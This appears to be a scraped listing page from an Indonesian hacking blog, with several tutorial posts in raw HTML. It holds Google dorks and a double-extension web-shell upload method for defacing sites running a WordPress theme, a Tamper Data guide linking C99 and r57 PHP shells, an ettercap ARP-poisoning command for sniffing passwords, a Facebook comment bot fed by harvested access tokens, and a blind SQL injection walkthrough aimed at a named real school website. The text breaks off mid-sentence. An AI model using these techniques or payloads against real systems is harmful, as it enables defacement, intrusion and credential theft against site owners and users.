berikan :)</span></div><div><span style="color: red;"><br /></span></div><div><span style="color: red;">kalo kurang jelas, boleh tanya kan pada <a href="http://facebook.com/cracker.indo" target="_blank">ORANG CAKEP INI XD</a></span></div><div><br />Sekian :)</div><div><br /></div><div>Keyword : <span style="color: #666666;">Cara deface dengan CSRF , Deface Website Mudah , Cara deface website , Cara ampuh deface website</span></div><div><ul></ul></div></div>

Deface Dengan CSRF (Cross Site Request Forgery)

Assalamualaikum :) Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D Bahan-B...

Baca selengkapnya »

Membuat Setan Facebook (BOT KOMENTAR)

Selamat siang semua, dari apda gak ada kerjaan mending nih ane share cara buat BOT Komentar :D<br /><br />Pertama tama kalian harus punya Hosting/Cpanel terlebih dahulu, kalo untuk percobaan sih pake hosting gratis aja :D ,<br /><br />#<span style="color: yellow;">MAAF, UNTUK MASALAH HOSTING KALIAN COBA CARI SENDIRI YA :p</span><br /><span style="color: yellow;"><br /></span>Oke next, saya umpamakan kalian sudah punya hosting jadi bahan yang dibutuhkan selanjutnya yaitu SCRIPT BOT, untuk script bot kalian bisa ambil <span style="color: blue;"><a href="http://scriptbot11.p.ht/bimo.txt" target="_blank">DISINI</a> (Copas Semua)</span><br /><span style="color: blue;"><br /></span>Untuk akses tokennya, kalian bisa ambil <a href="http://hendroo.com/token.php" target="_blank">DISINI</a><br /><br />Contoh akses token : https://m.facebook.com/?_rdr#access_token=<span style="color: red;">AAAAAC3zphqEBAJd8dlZCnizM6k2JsB3RTlpHafKIGLyeiEPmZBFp3zz9sk0ZB4DV90ur7kE4ZAv6rxnA0TF6hZCcpHn5ZCMSYNUMZCWADwVhQZDZD</span>&expires_in=0<br /><br />#Yang berwarna merah adalah akses tokennya<br /><br />Oke, untuk pemasangan nih kalian bisa lihat <a href="http://indocyberarmy.blogspot.com/2012/12/buat-auto-komentar-dan-like-facebook.html" target="_blank">DISINI</a><br /><br />Untuk <span style="color: red;">CRON JOB </span>kalian bisa ke <a href="http://www.webcron.org/">http://www.webcron.org</a><br /><br />sekian tutor semrawut dari ane :D<br /><br />#<span style="color: cyan;">Nb : setelah selesai mengambil token, segera hapus aplikasi pengambilan akses token <a href="https://www.facebook.com/settings?tab=applications" target="_blank">(DISINI)</a></span><br /><br /><span style="color: red;">KALO GAGAL JUGA, BOLEH PM <a href="http://facebook.com/cracker.indo" target="_blank">SAYA DISINI</a></span><br /><br />trimakasih,<br /><br />Keyword : <span style="color: #444444;">Cara Membuat Bot Like, Cara Membuat Bot Komentar, Cara Mudah Buat BOT Komentar, BOT Auto Like dan Komentar</span>

Membuat Setan Facebook (BOT KOMENTAR)

Selamat siang semua, dari apda gak ada kerjaan mending nih ane share cara buat BOT Komentar :D Pertama tama kalian harus punya Hosting/Cpane...

Baca selengkapnya »

Cara Deface Dengan Shell upload vulnerability

<div dir="ltr" style="text-align: left;" trbidi="on"><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">Langsung saja ;) </span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"> </span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">Dork :<br /></span></span></pre><blockquote><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">inurl:"/?ptype=post_listing"<br />inurl:"/?ptype=post_event"<br />inurl:"/?page=property_submit"<br />intext:"Geo Places Theme by"<br />intext:"(You can upload more than one images to create image gallery on detail page)"</span></span> </pre></blockquote><br /><span style="font-family: lucida sans unicode,lucida grande,sans-serif;">Site::</span> <br /><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">- http://site.com/?ptype=post_listing</span><br /><span style="font-size: 12px;">- http://</span></span><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">site.com</span></span>/?ptype=post_event</span><br /><span style="font-size: 12px;">- http://</span></span><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">site.com</span></span>/path/?ptype=post_listing</span><br /><span style="font-size: 12px;">- http://</span></span><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">site.com</span></span>/path/?ptype=post_event</span></span> </span></span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"> </span></span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">Sebelumnya Rename dulu Shellmu jadi ext. jpg</span></span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">cth: shell.php.jpg / shell.php;.jpg</span></span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">Upload shellmu,, gunakan tamper data. </span></span></span> Silahkan Lihat <a href="http://indocyberarmy.blogspot.com/2013/02/cara-tamper-data-upload-php-file.html" target="_blank">Cara Tamper Data (Upload PHP File)</a></span></span> </span></span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"> </span></span><br /><span style="font-size: 12px;"></span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"> </span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><b><span style="font-size: 12px;">Hasilnya bisa dilihat</span></b><br /><span style="font-size: 12px;">- http://</span></span><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">site.com</span></span>/wp-content/themes/GeoPlaces/images/tmp/[shellmu]</span><br /><span style="font-size: 12px;">- http://</span></span><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">site.com</span></span>/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]</span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;"> </span></span></pre><pre><b><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">Video Tutorial </span></span></b></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">  </span></span></pre><pre><span style="font-family: lucida sans unicode,lucida grande,sans-serif;"><span style="font-size: 12px;">  </span><br /><iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/kfyg4Oag8I0?feature=player_detailpage" width="640"></iframe><br /></span></pre><iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/kfyg4Oag8I0?feature=player_detailpage" width="640"></iframe></div>

Cara Deface Dengan Shell upload vulnerability

Langsung saja ;)   Dork : inurl:"/?ptype=post_listing" inurl:"/?ptype=post_event" inurl:"/?page=property_submit...

Baca selengkapnya »

Cara Tamper Data (Upload PHP file)

<div dir="ltr" style="text-align: left;" trbidi="on">Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.<br /><br />1. Siapkan dulu file shell.php seperti : <a href="http://pastebin.com/f29bc8494">C99Shell</a>, <a href="http://pastebin.com/f1c206471">r57</a>, atau lainya cari aja di google banyak <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /><br />2. Rename dengan nama : shell.php.jpg<br />3. <a href="http://adf.ly/JW63V" target="_blank">Install add ons Tamper Data</a> dulu di browser mozilla kita<span style="font-family: lucida sans unicode,lucida grande,sans-serif;">, Download <a href="http://adf.ly/JW63V" target="_blank">disini</a></span> <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /> <span id="more-128"></span><br />4. Restart dan kita mulai upload<br />5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan<br /><br /><img alt="" class="aligncenter" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxAkXzfGxLj08MI6WfwjRsTxcrDkdxbzH9FvYMrxekYEjRmsi5t4Yz3cKjnz4JX2PYaf76V9E2cfvzFtrFROCM_W4I7DOCoPJGTit0rVvKgp-oVJvl2jpVT2F0h6yLfTeOBHuoOmQr5Ug/s1600/tamper.PNG" /><br /><br />6. Trus Uploads shell.php.jpg kita dan tamper <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /><br /><img alt="" class="aligncenter" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGNAnFpgOyRpuvHuBbmeeBUXr2GQOqnO6MLdaDMmQkeFlSd8ySVCin6fxxusDWR9JMRxbTt5dtEpHY_zhyphenhyphengBmFfccSYrhf9EdtiBKb6-z9vhVx33SnFjOqzhZGIRMqrUMfqibDfwYpKfc/s1600/tamper+2.PNG" /><br /><br />7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /><br /><img alt="" class="aligncenter" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9mMPhCpLuljdBiUrfdrisoRVgqAriEvtCxwpt3Jgu_MXFaxGAvOC99CsCU4YkOSovvNd-dtJU7b1qDLshOyuTMgoY-W4ITp6_K2hNS2tffwZBL7cpiiCE2LNR7pZoYJnktedq1WVQMQ8/s1600/tamper+3.PNG" /><br /><br />Sekarang anda tinggal cari dimana file shell anda berada .<br />Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /> <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /></div>

Cara Tamper Data (Upload PHP file)

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung ...

Baca selengkapnya »

Kekuatan MITM

<div dir="ltr" style="text-align: left;" trbidi="on">MITM merupakan kepanjangan dari Man In The Middle, atau sering dikenal sebagai ARP poisoning. Adalah salah satu pelanggaran hak penggunaan dan keamanan jaringan, dengan mencuri paket, dan mengganti setiap public key packet. Sudah diterangkan sebelumnya mengenai MITM dalam blog ini, anda bisa membaca kronologi MITM di <a href="http://double-dragon.blogspot.com/2011/09/man-in-middle.html" target="_blank">sini</a>.<span class="fullpost"> </span><br /><br /><div></div><div>Dalam kesempatan ini, saya akan menjelaskan, betapa pentingnya MITM dalam process sniffing. Kali ini saya menggunakan tool yang bernama Etherape, dan untuk melakukan MITM, saya menggunakan Ettecap.</div><div></div>Awalnya, saya akan memonitoring jaringan dengan Ettherape. Ini unik, karena Etherape akan menunjukan sebuah topologi jaringan, dan memberikan informasi traffic pada sebuah jaringan.<br /><a href="http://www.blogger.com/blogger.g?blogID=8688590231472219669" name="more"></a><br /><br />Setelah terhubung dengan wireless local area network, saya membuka etherape. Dan melakukan monitoring jaringan.<br /><br />Berikut screen shoot Etherape sebelum proses MITM dijalankan.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-SLJM30hxD1M/TuDHp0_uv4I/AAAAAAAAAvQ/pkpdyi2HdjA/s1600/etherape1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="http://4.bp.blogspot.com/-SLJM30hxD1M/TuDHp0_uv4I/AAAAAAAAAvQ/pkpdyi2HdjA/s320/etherape1.jpg" width="320" /></a></div><br /><br />Terlihat jelas disini bahwa hanya ada beberapa host yang tampak. Namun etherape masih dapat memberikan informasi, kemana host pergi. Dan tidak banyak traffic yang tertangkap. Lalu bagaimana jika MITM dijalankan?<br /><br />Buka terminal, lalu masukan perintah:<br /><br /><b>ettercap -T -q -i wlan0 -M ARP:REMOTE // //</b><br /><b><br /></b><br />Kemudian ini yang terjadi pada etherape.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-O4_G0onV6IA/TuDIRLbkh9I/AAAAAAAAAvY/_ZHdTXg9H3E/s1600/mitm.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="http://4.bp.blogspot.com/-O4_G0onV6IA/TuDIRLbkh9I/AAAAAAAAAvY/_ZHdTXg9H3E/s320/mitm.jpg" width="320" /></a></div><br />Woooow. Traffic dimana-mana. Dengan menggunakan wireshark, kita dapat menangkap paket-paket ini, termasuk password, isi chatting, isi status facebook / twitter, dan lain-lain.<br /><br />Selamat mencoba.<br /><br /><b>Created by:</b><br /><b><span class="Apple-style-span" style="color: red;">red-dragon</span></b><br /><b><br /></b></div>

Kekuatan MITM

MITM merupakan kepanjangan dari Man In The Middle, atau sering dikenal sebagai ARP poisoning. Adalah salah satu pelanggaran hak penggunaan ...

Baca selengkapnya »

Motif Seorang Hacker

<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Pertanyaan ini hampir tidak pernah terpikirkan oleh saya, sampai suatu hari, kekasih saya menanyakan hal ini kepada saya.</span><span class="fullpost"> </span><br /><br /><div></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: medium;"><i>"Apa sih, motif seorang hacker?"</i></span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: medium;"><i><br /></i></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Entah mengapa pertanyaan ini mejadi begitu sulit, dan saya membutuhkan waktu agak lama untuk menemukannya. Sayapun memiliki jawaban demikian.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div><div><span class="Apple-style-span" style="color: red; font-family: 'Courier New', Courier, monospace; font-size: medium;"><b>red-dragon</b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b><i>"Aku mempelajari bagaimana cara seorang hacker masuk ke dalam system. Sehingga aku bisa mencegahnya masuk ke system. Ini sama seperti konsep penetration test."</i></b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Pertanyaan ini kemudian memicu saya untuk menanyakan kepada orang lain yang seprofesi dengan saya a.k.a <b><span class="Apple-style-span" style="color: red;">hacker</span></b>. Mari lihat jawaban mereka.</span><br /><a href="http://www.blogger.com/blogger.g?blogID=8688590231472219669" name="more"></a></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: medium;"><b>G-Conus8211:</b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b><i>"klo saya cuma ajang balas dendam.... saya nyari tempat dimana saya lebih dihargai orang lain... dan juga iseng" tentunya soalnya bosan gk ada kerjaan di rumah"</i></b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b><i><br /></i></b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: medium;"><b>./e1NZTE1n[$]</b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span><br /><div style="font-style: italic;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>"klo aku sih cm pengen meng-ekspresikan uneg2 dg cara deface.. </b></span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b><div style="font-style: italic;">just for fun.. hehe.. coz bisanya cm deface. sementara baru itu motifnya.. tp masi pengen blajar yg laen.. pengen kaya om dragon, maen linux nya keren.."</div><div style="font-style: italic;"></div><div><span class="Apple-style-span" style="font-size: medium;">mydisha</span></div><div style="font-style: italic;"><div>"kalau saya karena penasaran,kalo udah penasaran sama sesuatu pasti bakal di paksa buat dapat itu,termasuk soal security gan :)"</div></div><div style="font-style: italic;"></div></b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: medium;"><b>Dr.A</b></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span><br /><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b><i>"kalo ane sich cuma buat belajar n nambah pegetahuan di dunia cyber and komputer.... belajar gimana caranya menangkal para hacker n memproteksi system kemanan.... meskipun tidak ada yang 100% di internet kan tidak salah klo cuma mencapai tingkat keamanan 99%... Menghancurkan memang mudah...tapi mencoba untuk memperbaiki itu sulit..."</i></b></span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><div></div><div><b><span class="Apple-style-span" style="font-size: medium;">Gariz</span></b></div><div><b><i>"Berbuat JAHAT, balas dendam, Cari DUIT, mas bro..."</i></b></div><div></div><div><b><span class="Apple-style-span" style="font-size: medium;">whosyourdaddy</span></b></div><div><div><b><i>"hmm.. kalo ane sih cuma sekedar mencari ilmu sama pengen tau aja"</i></b></div></div><div></div><div><b><span class="Apple-style-span" style="font-size: medium;">renzrawk</span></b></div><div><div><b><i>"kalo ane pngn jadi yg terbaik. agar komunitas kita bangga terhadap kita. karena kita berexplorasi membawa nama komunitas kita. hehehe lebay."</i></b></div></div><div><b><i><br /></i></b></div><div><b><span class="Apple-style-span" style="font-size: medium;">aandoni</span></b></div><div><div style="font-style: italic; font-weight: bold;">"ingin mengetahui sesuatu kk...<br /><div style="display: inline !important;"><b style="font-style: normal;"><i>ini agak asiik..... menarik untuk di pelajarin"</i></b></div><b style="font-style: normal;"><i></i></b></div><div><div style="font-style: italic; font-weight: bold;"></div><div style="display: inline !important;"><div style="font-style: italic; font-weight: bold;"><b style="font-style: normal;"><i><br /></i></b></div><div style="font-style: italic; font-weight: bold;"><b style="font-style: normal;"><i><br /></i></b></div><span class="Apple-style-span" style="font-weight: 800;"><span class="Apple-style-span" style="font-size: medium;">Xenon-id</span></span><br /><span class="Apple-style-span" style="font-weight: 800;"></span><br /><i><b>"Saya bukanlah hacker, tapi jika saya ditanya seperti itu spontan di benak saya muncul ..</b></i><br /><i><b>"Saya ingin mencari tempat dimana suara saya bisa didengar, mereka bisa berbuat banyak hal tetapi inilah seni saya. mereka hebat dan berbakat, sedangkan saya hanyalah pria yang hanya berani menatap monitor..."</b></i><br /><i><b><br /></b></i><br /><i><b><br /></b></i><br /></div><b style="font-style: normal; font-weight: bold;"><i></i></b><div style="font-style: italic; font-weight: bold;"></div></div><div><div style="display: inline !important;">Saya masih terus mencari jawaban lain, baik di dunia nyata, maupun di dunia maya. Semua alasan ini bisa menjadi pertimbangan bagi anda, apakah hacker itu baik, atau buruk.</div></div></div><div><div style="display: inline !important;"></div></div><div><div style="display: inline !important;">documented by:</div></div><div><div style="display: inline !important;"><b><span class="Apple-style-span" style="color: red;">red-dragon</span></b></div></div></span></div></div>

Motif Seorang Hacker

Pertanyaan ini hampir tidak pernah terpikirkan oleh saya, sampai suatu hari, kekasih saya menanyakan hal ini kepada saya. "Apa sih, mo...

Baca selengkapnya »

Man In The Middle

<div dir="ltr" style="text-align: left;" trbidi="on">Aloha, para penendang bokong yang sejahtera. Kali ini saya mau sedikit berbagi dengan tindakan yang paling riskan jika terjadi dalam sebuah jaringan kerja. Banyak yang belum tau MITM alias Man In The Middle. Sebuah teori yang masuk akal dan kebanyak orang mengenalnya dengan sebutan ARP poison. Biasa dipakai dalam proses sniffing jaringan kerja, atau sekedar memonitoring jaringan kerja seperti yang dilakukan airmon-ng.<br /><br />MITM sendiri memiliki konsep yang sederhana, layaknya namanya Man In The Middle, pelaku MITM berada diantara korban dan access point. Kurang lebih seperti ini.<br /><br />Korban ----- Bad Guy ----- Access Point<br /><br />Apa yang dilakukan oleh orang jahat ini? Sederhananya ia menangkap paket yang dikirim oleh Korban kepada access point. Paket sendiri bisa berupa perintah, permintaan, data, informasi, bahkan password. Sebagai contoh.<br /><br />Adhisty ----- Omega ------ Yosie<br /><br />Adhisty mengirim surat kepada Yosie yang berisi "Haiiii.. Ini Adhisty.. Siapa namamu?". Perjalanan surat ini ternyata tidak sebaik isi pesannya. Di tengah perjalanannya yang menyenangkan (tadinya), surat ini digrebek oleh Omega. Membawanya kedalam, dan membongkar isi pesan. Setalah membaca isi pesan, pesan ini diteruskan kepada Yosie. Yosie menerima isi pesan, dan membacanya.<br /><br />Adhisty ----- Omega [Haiiiii.. Ini Adhisty.. Siapa namamu?"] -----> Yosie<br /><br />Kemudian dengan lugunya Yosie menjawab pesan tersebut, dan mengirimkannya kembali kepada Adhisty. Hanya saja, kali ini isi pesan telah dienkripsi.<br /><br />Adhisty ----- Omega <----- [##Nama saya Yosie :)##] Yosie<br />Ket: # adalah enkripsi milik Yosie<br /><br />Suratku sayang, suratku malang, mengapa kejadian buruk dapat menimpamu dua kali? Kembali surat ini digrebek, dan dibongkar isinya. Dan mengubahnya. Pada tahap ini Omega Tidak mampu membaca isi pesan, karena pesan dienkripsi oleh enkripsi milik Yosie. Kedengarannya seperti ingin mengadu domba, namun tunggu dulu. Dalam MITM, Omega hanya mengubah sebagian kecil isi pesan, format sama namun isi berbeda.<br /><br />Adhisty <----- [**Nama saya Omega :D**] Omega ----- Yosie<br />Ket: * adalah enkripsi milik Omega<br /><br />Adhisty menerima isi pesan, dan percaya bahwa pesan ini datang dari Yosie. Karena hanya Yosie yang dapat membaca isi pesan. Adhisty menggunakan enkripsi Omega, karena dia pikir ini adalah Enkripsi milik Yosie, dan hanya Yosie yang dapat membaca kode Enkripsi ini.<br /><br />Adhsity [**Temui aku di depan Kampus ;)**] -----> Omega ----- Yosie<br /><br />Surat ini ditangkap kembali. Gawatnya, karena Adhisty memakai enkripsi milik Omega, jadi Omega mampu membaca isi pesan, memodifikasinya, dan menghapusnya, bahkan menyimpannya. Puncaknya adalah ketika Adhisty atau Yosie mengirimkan sebuah password, anda tau seberapa frustrasinya anda ketika seseorang yang tidak anda kenal mengetahui password anda. Jika anda pikir Facebook, atau Twitter tidak masalah, lalu bayangkan jika PIN ATM anda tertangkap oleh Bad Guy?<br /><br />Lalu bagaimana dengan jalur aman di port 443 alias SSL? Port 80 adalah port standar untuk browsing. Jika kamu melihat di address bar <b><span class="Apple-style-span" style="color: red;">http</span></b>://blablabla maka kamu sedang menggunakan jalur 80. Alias jalur jalan raya yang rawan copet. Namun jika kamu melihat <b><span class="Apple-style-span" style="color: red;">https</span></b>://blablabla maka kamu sedang menggunakan jalur 443 yang labih aman. Setiap paket yang dikirim tidak akan dapat di stop atau dibajak oleh Bad Guy. Waaah, kalau gitu saya mau pake jalur 443 terus aaaaah.<br /><br />Tunggu dulu.... Anda yakin anda sudah aman? Pernahkah mendengar istilah routing? Dalam post saya beberapa minggu lalu, saya menjelaskan tentang SSL Strip. Konsepnya mudah, bayangkan anda sedang berkendara, dan hendak masuk jalan tol yang aman dari pada jalan raya. Coba liat <a href="http://double-dragon.blogspot.com/2011/08/ssl-strip-hijack-facebook-password.html">ini.</a><br /><br />Anda ----- Jalan Tol<br /><br />Kemudian saya hadir.<br /><br />Anda ----- Saya ----- Jalan Tol<br /><br />Sebuah aksi routing memungkinkan saya untuk mengalihkan perjalanan anda ke tempat lain. Dalam kasus ini, saya tidak mengizinkan anda masuk jalan tol, dan meminta anda untuk kembali ke jalan umum.<br /><br />Anda ----- Saya [Maaf, jalan tol ditutup, silahkan gunakan jalan raya. :D] ---- Jalan Tol<br /><br />Ketika anda di jalan raya, Bad Guy dengan mudahnya mencuri paket anda yang tidak terenkripsi. Jadi apa yang anda mau sekarang? Tutorial MITM? Atau pencegahan MITM? Anda bisa beri komentar dibawah, hasil voting akan saya putuskan seminggu ke depan. Share ini kepada teman kamu, agar pilihan kamu menjadi postingan saya berikutnya.<br /><br /><b><span style="color: red;">red-dragon</span></b><br /><br /></div>

Man In The Middle

Aloha, para penendang bokong yang sejahtera. Kali ini saya mau sedikit berbagi dengan tindakan yang paling riskan jika terjadi dalam sebuah...

Baca selengkapnya »

Blind SQL Injection

<div dir="ltr" style="text-align: left;" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhejJTgqFahjMkmNfhh-KFUVHwn3xfllj2B0jofSFZfPAW2tcoMMmfhkC-ouaj3I_a3EVmvvQwN4mOKmxDTm5gTfaIdOm7FnJ63_slmWTuCH917fJ-_iG-HEwUeTPayeQmuZW7tI2NcXKA/s1600/blind-skull-thumb-danger.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" id="irc_mi" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhejJTgqFahjMkmNfhh-KFUVHwn3xfllj2B0jofSFZfPAW2tcoMMmfhkC-ouaj3I_a3EVmvvQwN4mOKmxDTm5gTfaIdOm7FnJ63_slmWTuCH917fJ-_iG-HEwUeTPayeQmuZW7tI2NcXKA/s200/blind-skull-thumb-danger.gif" style="margin-top: 76px;" width="165" /></a>Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...<br /><br /> Apa sich Blind SQL Injection tu?<br /><br /><br /><br />Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...<br /><br />disini GT memakai command :<br /><br />mid()= hampir sama fungsinya dengan substring()<br />char()= adalah peubah dari karakter<br /><br />lanjut..<br /><br />ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..<br />kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema<br /><br />kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw<br /><br />lanjut...<br /><br />Target: www.smanti.com (thx to bejamz udah ngasih target :)<br /><br />1.PENGETESAN BUG<br /><br />Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1<br /><br /><br />www.smanti.com/berita.php?id=5 and 1=0 <<<false<br /><br />www.smanti.com/berita.php?id=5 and 1=1 <<<true<br /><br />eh ternyata ada bug nya...<br /><br />lanjut....<br /><br />2.BLIND INJECT<br /><br />Query yg dipakai: and mid(user(),1,1)=CHAR(65)<br /><br />saya jelaskan sedikit deh..<br /><br />mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut<br /><br />sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.<br />kenapa kita mulai dengan 65 ?<br />karena "65" adalah "A" dalam ascii...<br /><br />lanjut..<br /><br />mari kita masukkan<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)<br /><br />ternyata hasilnya masih false (beritanya hilang)<br /><br />berarti value yg kita masukkan salah..<br /><br />tinggal tambah value na..jadi..<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..<br /><br />dst sampe kita menemukan keadaan true(beritanya muncul kembali)<br /><br />kebetulan ada di char(83)<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..<br /><br />cape?masih kuat?hahaha..trial n error...<br /><br />lanjut..<br /><br />kita tambain value na..<br /><br />www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)<br /><br />adakah perbedaan nya?<br /><br />yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..<br /><br />gini nih..<br /><br />1,1 = value pertama user<br />1,2 = value kedua user<br />1,3 = value ketiga user<br />dst<br />dan 83 adalah nilai 